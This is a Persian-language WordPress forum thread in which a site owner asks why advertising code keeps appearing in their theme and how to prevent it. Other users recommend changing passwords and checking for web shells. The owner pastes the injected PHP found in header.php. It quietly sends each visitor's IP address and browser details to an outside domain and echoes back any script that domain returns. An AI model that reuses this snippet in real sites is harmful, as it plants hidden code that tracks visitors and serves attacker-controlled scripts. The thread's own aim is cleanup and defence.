رفتن به مطلب

اضافه شدن کد تبلیغاتی به سورس قالب


chemist

پست های پیشنهاد شده

با سلام و عرض خسته نباشید؛

برای بار دوم هست که در سورس قالب سایت بنده کد تبلیغاتی قرار میگیرد، یکبار در فوتر که لینکهای مخفی تبلیغ یک سایت فروش وی*پ*ی*ن و ... بود که با آپدیت خود وردپرس حذف شدند، و بار دوم بالاترین قسمت سایت کمی پایینتر میومد! و یک مربع کوچک در فرمت فلش که به یک سایت خارجی لینک شده بود! که اون هم با اسکن توسط یک آنتی ویروس مخصوص وردپرس به عنوان یک فایل مخرب شناخته شده، در فایل header.php حذف شد و الان ظاهراً مشکل حل شده ...

لازم به ذکر هست مرتباً پلاگین ها و وردپرس بروزرسانی می شوند.

سوال بنده این هست که بهترین روش برای جلوگیری از آلوده شدن فایلهای وردپرس و پلاگین ها به چنین کدهایی چیست؟ و راه ورود چنین کدهایی چیست؟

ویرایش شده توسط chemist
لینک به ارسال

ممنون از دوستان که لطف کردن و راهنمایی فرمودن: کد متخلف رو پیدا کردم! ولی اینکه دلیلش چی میتونه باشه رو نمیدونم؟؟؟؟؟؟


<?php
#b1c17b#
error_reporting(0); ini_set('display_errors',0); $wp_vxdk88 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_vxdk88) && !preg_match ('/bot/i', $wp_vxdk88))){
$wp_vxdk0988="http://"."html"."-title".".com/title"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_vxdk88);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_vxdk0988);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_88vxdk = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_88vxdk,1,3) === 'scr' ){ echo $wp_88vxdk; }
#/b1c17b#
?>

با سپاس

لینک به ارسال

میهن وب هاست، با حذف این کدها برطرف شدند ... فقط میخواستم بدونم دلیل وجود این کدها در فایل هدر سایت چیه؟؟؟ ... و چطور میشه از این اتفاق جلوگیری کرد؟

قسمت بالای سایت به اندازه نیم سانت میومد پایین! و یک مربع کوچولو در سمت راست گوشه راست سایت دیده میشد که با کلیک بر روی اون به یک سایت خارجی میرفت!!!

لینک به ارسال

امنیت میهن وب هاست چون اشتراکیه ضعیفه احتمال اینکه هک شده باشی هم هست. پیشنهاد میکنم امنیت سایت رو ببر بالا و تمام پسورد های هاست،وردپرس و ایمیل رو عوض کن.

لینک به ارسال

برای تغییر پسوردها؛ پسورد اف تی پی، نام دیتا بیس، پسور یوزر دیتا بیس و پسورد ورود به سی پنل، و پسورد مدیریت وردپرس رو عوض می کنم.

فقط یک سوال برای اینکه برای سایت مشکلی پیش نیاد، با تغییر نام و یوزر و ... دیتابیس در فایل کانفیگ وردپرس دیگه مشکلی پیش نمیاد که؟ یعنی فقط تنها کاری که می کنم این هست که؛ پسوردها رو عوض می کنم و فایل کانفیگ وردپرس رو بروز می کنم و تمام، درسته؟

ویرایش شده توسط chemist
لینک به ارسال

آموزش های موجود رو که دوستمون لینک دادن کامل بخونید.

بررسی بکنید فایل شل وجود نداشته باشه (توی تایپیک های فوق و تایپیک های مشابه به دفعات زیاد مطرح شده)

لینک به ارسال

البتّه خب باید اینم توجّه داشته باشیم دوستان که با قیمت هایی که میهن وب هاست ارائه میده اصلاً غیراشتراکی نمیشه هم هاست داد...

اکثر هاستینگ ها هاست اشتراکی میدن و البتّه خب برخی هاشون یه سری مسائل امنیّتی رو بیشتر رعایت میکنن.

من خودم از میهن وب هاست استفاده میکنم و از لحاظ امنیّتی تا به حال در مورد هاست برام مسئله ای پیش نیومده.

لینک به ارسال

به گفتگو بپیوندید

هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .

مهمان
ارسال پاسخ به این موضوع ...

×   شما در حال چسباندن محتوایی با قالب بندی هستید.   حذف قالب بندی

  تنها استفاده از 75 اموجی مجاز می باشد.

×   لینک شما به صورت اتوماتیک جای گذاری شد.   نمایش به صورت لینک

×   محتوای قبلی شما بازگردانی شد.   پاک کردن محتوای ویرایشگر

×   شما مستقیما نمی توانید تصویر خود را قرار دهید. یا آن را اینجا بارگذاری کنید یا از یک URL قرار دهید.

×
×
  • اضافه کردن...